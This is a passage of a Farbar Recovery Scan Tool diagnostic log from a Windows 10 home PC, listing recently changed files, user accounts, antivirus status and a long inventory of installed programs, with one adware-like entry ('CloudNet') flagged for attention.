2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 14:05 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19
==================== Files in the root of some directories ========
2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (24-11-2019 19:51:29)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version: - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version: - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version: - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version: - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version: - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version: - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version: - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version: - )
Entity Framework 6.2.0 Tools for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version: - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version: - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version: - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version: - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version: - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version: - )
LLH7X (HKLM-x32\...\LLH7X) (Version: - )
LLH8X (HKLM-x32\...\LLH8X) (Version: - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version: - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version: - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version: - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version: - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
